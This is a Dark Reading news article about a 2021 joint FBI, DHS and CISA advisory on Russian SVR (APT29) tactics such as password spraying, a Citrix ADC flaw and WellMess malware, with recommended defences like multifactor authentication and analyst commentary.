Dark Reading is part of the Informa Tech Division of Informa PLC

This site is operated by a business or businesses owned by Informa PLC and all copyright resides with them.Informa PLC's registered office is 5 Howick Place, London SW1P 1WG. Registered in England and Wales. Number 8860726.

Threat Intelligence

4/26/2021
07:20 PM
Connect Directly
Twitter
LinkedIn
RSS
E-Mail
50%
50%

US Urges Organizations to Implement MFA, Other Controls to Defend Against Russian Attacks

Actors working for Moscow's Foreign Intelligence Service are actively targeting organizations in government and other sectors, FBI and DHS say.

The FBI, the Department of Homeland Security (DHS), and the Cybersecurity & Infrastructure Security Agency (CISA) are urging US organizations to implement multifactor authentication and other defensive mechanisms to protect against threat activity by Russia's Foreign Intelligence Service (SVR).

In a new joint advisory out today, the three entities warn government agencies, think tanks, information technology companies, and policy analysis organizations in particular to watch out for attacks from APT29, a threat group that they describe as working for the SVR.

Related Content:

US Formally Attributes SolarWinds Attack to Russian Intelligence Agency

Special Report: Tech Insights: Detecting and Preventing Insider Data Leaks

New From The Edge: Cybersecurity and the Way to a Balanced Life

The alert does not point to any specific new and recent threats or attacks from APT29 (aka Cozy Bear, Dukes, and Yttrium) targeting organizations in these sectors. But it does note the longstanding threat the group has posed to US organizations and the group's use of customized tools to maximize stealth and to move laterally within victim networks. Since at least 2018, the group has shifted from predominantly targeting on-premises assets to targeting cloud-hosted email and other cloud resources, the three agencies say.

"[SVR] will continue to seek intelligence from US and foreign entities through cyber exploitation, using a range of initial exploitation techniques that vary in sophistication, coupled with stealthy intrusion tradecraft within compromised networks," the alert notes.

This is the second time that US law enforcement has warned of SVR threat activity in the last two weeks. On April 15, shortly after the Biden administration formally attributed the SolarWinds attack to SVR, the FBI, DHS, and CISA released an advisory warning about the Russian intelligence service exploiting five known vulnerabilities in VPNs and other technologies to compromise US companies.

That advisory highlighted how, in addition to the SolarWinds supply chain attack, the SVR was responsible for several other recent campaigns, including several targeted attacks on COVID-19 research facilities.

Organizations should pay attention to advisories such as these that offer information on adversary tradecraft and recommendations for addressing threats that an adversary might present, says Sean Nikkei, senior cyber-threat intelligence analyst at Digital Shadows. "We have to assume that there are ongoing or will be new campaigns due to the nature of intelligence collection for strategic goal," Nikkei says.

"The information can certainly help any organization because it gives them a chance to update and vet their signatures, talk to their vendors, and think about how they might be targeted," he says.

The new advisory highlights three tactics that SVR and threat groups working for it have been observed using in recent attacks: password spraying, zero-day exploits, and the use of a malware tool set called WellMess for enabling encrypted command-and-control sessions on an infected system.

The advisory points to a 2018 compromise, where SVR agents used password spraying to find and exploit a weak password to an administrator account. The attack involved the adversary conducting the password spraying in a "low and slow" manner using a large number of local IP addresses associated with business, residential, and mobile accounts, in order to evade detection. The attackers used their access to the admin account to modify permissions and gain access to email accounts of specific interest to them, according to the joint advisory.

In another incident, actors working for SVR exploited a then zero-day vulnerability (CVE-2019-19781) in the Citrix Application Delivery Controller (ADC) to gain access to an enterprise network and harvest credentials, which they used to access other systems on the network. The actors acquired a foothold on several systems that were not configured for two-factor authentication. Though the breached organization eventually discovered the intrusion and evicted the attackers, they regained access via the same Citrix flaw. That initial access point was discovered as well, and closed down, according to the advisory.

The FBI, DHS, and CISA alert describes the WellMess malware family as being used in targeted attacks on COVID-19 research facilities. "These implants allow a remote operator to establish encrypted command and control (C2) sessions and to securely pass and execute scripts on an infected system," the advisory notes.

Multiple Recommendations
The three entities urge organizations to consider mandating the use of multifactor authentication for all on-premises and remote users and administrators. They also recommend that organizations allow access to admin systems and functions only from known IP addresses, conduct regular audits of account permissions and mailbox settings, and implement strong passwords.

To defend against zero-day threats, the advisory recommends that security teams monitor for evidence of encoded PowerShell commands and use of NMAP and other network scanning tools, and to ensure endpoint security and monitoring systems are enabled.

Defending against supply chain attacks such as the one that affected SolarWinds' customers can be tricky, the advisory concedes. But organizations can mitigate risk by implementing practices such as log file auditing to identify attempts to access privileged certificates; deploying controls for identifying suspicious behavior; implementing behavioral monitoring; and requiring authentication for certain user activities.

Dirk Schrader, global vice president of security research at New Net Technologies, says advisories such as the one released today help organizations get a better picture of the real-life operations of an advanced adversary. However, too many of them can end up being a distraction, he says. "Frequent advisories will lead to many questions from senior management and executive boards about the status of an organization in the light of those," he says. "Cybersecurity teams will be — at least — required to balance these requests with their regular work.”

A lot of the recommendations included in these advisories — such as enabling multifactor authentication and not allowing from remote logins from unknown IP addresses — are also things that organizations should be doing already, says Joseph Neumann, cyber executive advisor at Coalfire.

These advisories also just speak to the tactics, techniques, and procedures, Neumann notes. "These are helpful to a degree that allows administrators and defenders to know where to start their initial looks," he says. "But [they] fall short of giving [organizations] data that they can plug in to security tools to begin immediate automated remediations and mitigations."

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year ... View Full Bio
 

Recommended Reading:

Comment  | 
Print  | 
More Insights
Comments
Newest First  |  Oldest First  |  Threaded View
Commentary
Cyberattacks Are Tailored to Employees ... Why Isn't Security Training?
Tim Sadler, CEO and co-founder of Tessian,  6/17/2021
Edge-DRsplash-10-edge-articles
7 Powerful Cybersecurity Skills the Energy Sector Needs Most
Pam Baker, Contributing Writer,  6/22/2021
News
Microsoft Disrupts Large-Scale BEC Campaign Across Web Services
Kelly Sheridan, Staff Editor, Dark Reading,  6/15/2021
Register for Dark Reading Newsletters
White Papers
Video
Cartoon
Current Issue
The State of Cybersecurity Incident Response
In this report learn how enterprises are building their incident response teams and processes, how they research potential compromises, how they respond to new breaches, and what tools and processes they use to remediate problems and improve their cyber defenses for the future.
Flash Poll
How Enterprises are Developing Secure Applications
How Enterprises are Developing Secure Applications
Recent breaches of third-party apps are driving many organizations to think harder about the security of their off-the-shelf software as they continue to move left in secure software development practices.
Twitter Feed
Dark Reading - Bug Report
Bug Report
Enterprise Vulnerabilities
From DHS/US-CERT's National Vulnerability Database
CVE-2021-32716
PUBLISHED: 2021-06-24
Shopware is an open source eCommerce platform. In versions prior to 6.4.1.1 the admin api has exposed some internal hidden fields when an association has been loaded with a to many reference. Users are recommend to update to version 6.4.1.1. You can get the update to 6.4.1.1 regularly via the Auto-U...
CVE-2021-32717
PUBLISHED: 2021-06-24
Shopware is an open source eCommerce platform. In versions prior to 6.4.1.1 private files publicly accessible with Cloud Storage providers when the hashed URL is known. Users are recommend to first change their configuration to set the correct visibility according to the documentation. The visibilit...
CVE-2021-32712
PUBLISHED: 2021-06-24
Shopware is an open source eCommerce platform. Versions prior to 5.6.10 are vulnerable to system information leakage in error handling. Users are recommend to update to version 5.6.10. You can get the update to 5.6.10 regularly via the Auto-Updater or directly via the download overview.
CVE-2021-32713
PUBLISHED: 2021-06-24
Shopware is an open source eCommerce platform. Versions prior to 5.6.10 suffer from an authenticated stored XSS in administration vulnerability. Users are recommend to update to the version 5.6.10. You can get the update to 5.6.10 regularly via the Auto-Updater or directly via the download overview.
CVE-2021-32710
PUBLISHED: 2021-06-24
Shopware is an open source eCommerce platform. Potential session hijacking of store customers in versions below 6.3.5.2. We recommend to update to the current version 6.3.5.2. You can get the update to 6.3.5.2 regularly via the Auto-Updater or directly via the download overview. For older versions o...